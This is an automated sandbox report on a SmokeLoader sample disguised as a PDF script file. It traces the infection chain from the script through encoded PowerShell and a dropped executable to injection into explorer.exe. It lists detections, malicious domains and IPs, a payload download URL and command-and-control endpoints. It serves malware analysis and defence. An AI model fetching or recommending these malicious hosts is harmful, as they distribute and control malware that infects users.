      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525803 Sample: 3312.PDF.wsf Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 37 unicexpertmagazine.pw 2->37 39 ceoconstractionstore.pl 2->39 41 bestmagazineforanimalsunicum.ru 2->41 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 8 other signatures 2->53 10 wscript.exe 1 2->10         started        13 wbfgshs 2->13         started        signatures3 process4 signatures5 65 VBScript performs obfuscated calls to suspicious functions 10->65 67 Wscript starts Powershell (via cmd or directly) 10->67 69 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->69 77 2 other signatures 10->77 15 cmd.exe 1 10->15         started        71 Antivirus detection for dropped file 13->71 73 Multi AV Scanner detection for dropped file 13->73 75 Detected unpacking (changes PE section rights) 13->75 79 8 other signatures 13->79 process6 signatures7 85 Suspicious powershell command line found 15->85 87 Wscript starts Powershell (via cmd or directly) 15->87 89 Encrypted powershell cmdline option found 15->89 91 2 other signatures 15->91 18 powershell.exe 14 17 15->18         started        23 conhost.exe 15->23         started        process8 dnsIp9 43 unicexpertmagazine.pw 193.46.217.78, 49703, 49710, 49713 CUBENODEES Spain 18->43 33 C:\Users\user\AppData\Local\Temp\oBuf.exe, PE32 18->33 dropped 55 Powershell drops PE file 18->55 25 oBuf.exe 18->25         started        file10 signatures11 process12 signatures13 57 Antivirus detection for dropped file 25->57 59 Multi AV Scanner detection for dropped file 25->59 61 Detected unpacking (changes PE section rights) 25->61 63 9 other signatures 25->63 28 explorer.exe 33 2 25->28 injected process14 dnsIp15 45 ceoconstractionstore.pl 188.40.141.211, 49711, 80 HETZNER-ASDE Germany 28->45 35 C:\Users\user\AppData\Roaming\wbfgshs, PE32 28->35 dropped 81 Benign windows process drops PE files 28->81 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->83 file16 signatures17

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      3312.PDF.wsf5%ReversingLabsWin32.Trojan.Generic
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\wbfgshs100%AviraHEUR/AGEN.1312567
      C:\Users\user\AppData\Local\Temp\oBuf.exe100%AviraHEUR/AGEN.1312567
      C:\Users\user\AppData\Roaming\wbfgshs100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\oBuf.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\oBuf.exe82%ReversingLabsWin32.Trojan.SmokeLoader
      C:\Users\user\AppData\Roaming\wbfgshs82%ReversingLabsWin32.Trojan.SmokeLoader
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      bestmagazineforanimalsunicum.ru
      193.46.217.78
      truetrue
        unknown
        ceoconstractionstore.pl
        188.40.141.211
        truetrue
          unknown
          unicexpertmagazine.pw
          193.46.217.78
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://openclehardware.ru/index.phptrue
              unknown
              http://bestmagazineforanimalsunicum.ru/download/svc.exetrue
                unknown
                http://ceoconstractionstore.pl/index.phptrue
                  unknown
                  http://informcoopirationunicolceo.ru/index.phptrue
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000009.00000002.2697965705.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://wns.windows.com/batexplorer.exe, 00000009.00000000.1644607896.0000000009730000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2699343946.0000000009730000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvWexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000009.00000000.1640285854.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2693087527.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.1594654043.0000023BEEC47000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://biegpmdfbwuaocv.org/explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D0B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2159742625.000000000D0ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  http://schemas.microexplorer.exe, 00000009.00000002.2696616097.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1642682648.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1640014437.0000000002C00000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppinexplorer.exe, 00000009.00000002.2702499050.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2159742625.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        http://ceoconstractionstore.pl/explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmptrue
                                          unknown
                                          https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-wexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://contoso.com/powershell.exe, 00000004.00000002.1594654043.0000023BEEC47000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1555298135.0000023BE0427000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594654043.0000023BEEB04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594654043.0000023BEEC47000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://powerpoint.office.comcemberZexplorer.exe, 00000009.00000002.2702499050.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D0B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000CFF4000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              http://xcltdjfoaardilo.net/explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                http://ceoconstractionstore.pl/index.phpqexplorer.exe, 00000009.00000002.2705072858.000000000E0E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://api.msn.com/Xexplorer.exe, 00000009.00000002.2697965705.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controvexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1555298135.0000023BDEA91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://outlook.comNaP0Bexplorer.exe, 00000009.00000002.2702499050.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2159742625.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000009.00000000.1641669934.00000000070CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158638981.00000000070D7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1555298135.0000023BE0427000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594654043.0000023BEEB04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594654043.0000023BEEC47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1555298135.0000023BDECBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1555298135.0000023BDECBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-yearsexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://go.micropowershell.exe, 00000004.00000002.1555298135.0000023BDF6BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://nqgjgifqepqt.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000009.00000002.2704218980.000000000D617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2160776082.000000000D615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158231022.000000000D5DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158577894.000000000D5E3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://contoso.com/Iconpowershell.exe, 00000004.00000002.1594654043.0000023BEEC47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://biegpmdfbwuaocv.org/hpupexplorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&ocexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://word.office.com576explorer.exe, 00000009.00000002.2702499050.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2159742625.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://ebsdyhoseklppw.com/explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1555298135.0000023BDECBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://bestmagazineforanimalsunicum.rupowershell.exe, 00000004.00000002.1555298135.0000023BDFDE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1555298135.0000023BE00B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1555298135.0000023BE00AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://crl.mpowershell.exe, 00000004.00000002.1605660173.0000023BF6D53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://dneagbdmtkktop.org/explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://excel.office.comEexplorer.exe, 00000009.00000002.2702499050.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2159742625.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://nqgjgifqepqt.com/explorer.exe, 00000009.00000002.2704218980.000000000D617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2160776082.000000000D615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158231022.000000000D5DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158577894.000000000D5E3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000009.00000003.2159742625.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/aexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://ceoconstractionstore.pl/index.php2explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://aka.ms/pscore68powershell.exe, 00000004.00000002.1555298135.0000023BDEA91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://ebsdyhoseklppw.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000009.00000003.2160838999.000000000D611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158231022.000000000D5DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158577894.000000000D5E3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://crl.vpowershell.exe, 00000004.00000002.1601037332.0000023BF6A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://api.msn.com/$explorer.exe, 00000009.00000002.2697965705.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://www.msn.com:443/en-us/feedexplorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://dneagbdmtkktop.org/Siexplorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                188.40.141.211
                                                                                                                ceoconstractionstore.plGermany
                                                                                                                24940HETZNER-ASDEtrue
                                                                                                                193.46.217.78
                                                                                                                bestmagazineforanimalsunicum.ruSpain
                                                                                                                203178CUBENODEEStrue
                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1525803
                                                                                                                Start date and time:2024-10-04 15:09:11 +02:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 6m 59s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:13
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:1
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:3312.PDF.wsf
                                                                                                                renamed because original name is a hash value
                                                                                                                Original Sample Name:_i_300924_i_30_09_2024___UA973248410000000026006263312.PDF.wsf
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.expl.evad.winWSF@9/5@3/2
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 75%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                • Number of executed functions: 70
                                                                                                                • Number of non-executed functions: 15
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .wsf
                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7248 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • VT rate limit hit for: 3312.PDF.wsf
                                                                                                                TimeTypeDescription
                                                                                                                09:10:24API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                09:11:00API Interceptor736x Sleep call for process: explorer.exe modified
                                                                                                                15:11:00Task SchedulerRun new task: Firefox Default Browser Agent 1328DC9718E8D783 path: C:\Users\user\AppData\Roaming\wbfgshs
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                188.40.141.211RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • ceoconstractionstore.pl/index.php
                                                                                                                abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeGet hashmaliciousCryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLoggerBrowse
                                                                                                                • gmpeople.com/upload/
                                                                                                                vwaoMjcyAw.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • selebration17io.io/index.php
                                                                                                                Qi4Mj8hG3t.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • selebration17io.io/index.php
                                                                                                                br0A8E2X6I.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • selebration17io.io/index.php
                                                                                                                setup.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                • zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
                                                                                                                SecuriteInfo.com.Win32.Evo-gen.21074.1738.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • agressivemnaiq.xyz/
                                                                                                                A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                                                                                • host-data-coin-11.com/
                                                                                                                be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • host-data-coin-11.com/
                                                                                                                EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                                                                                • host-data-coin-11.com/
                                                                                                                193.46.217.78RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • unicexpertmagazine.pw/index.php
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                unicexpertmagazine.pwRmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 193.46.217.78
                                                                                                                3388.PDF.htaGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 185.219.7.204
                                                                                                                3312.PDF.scrGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 45.143.201.14
                                                                                                                ceoconstractionstore.plRmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 188.40.141.211
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                HETZNER-ASDERmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                • 188.40.141.211
                                                                                                                https://indexconectada.net.br/Get hashmaliciousUnknownBrowse
                                                                                                                • 85.10.195.17
                                                                                                                https://iasitvlife.roGet hashmaliciousUnknownBrowse
                                                                                                                • 49.12.228.110
                                                                                                                https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • 49.12.228.110
                                                                                                                Zxooek.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 88.198.46.204
                                                                                                                MOfHb44mph.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 144.76.53.154
                                                                                                                Full Litigation File.pdfGet hashmaliciousUnknownBrowse
                                                                                                                • 176.9.171.101
                                                                                                                file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                • 49.12.197.9
                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                • 49.12.197.9
                                                                                                                https://ahchoadeegu.homes?u=k8pp605&o=c9ewtnr&t=8845Get hashmaliciousUnknownBrowse
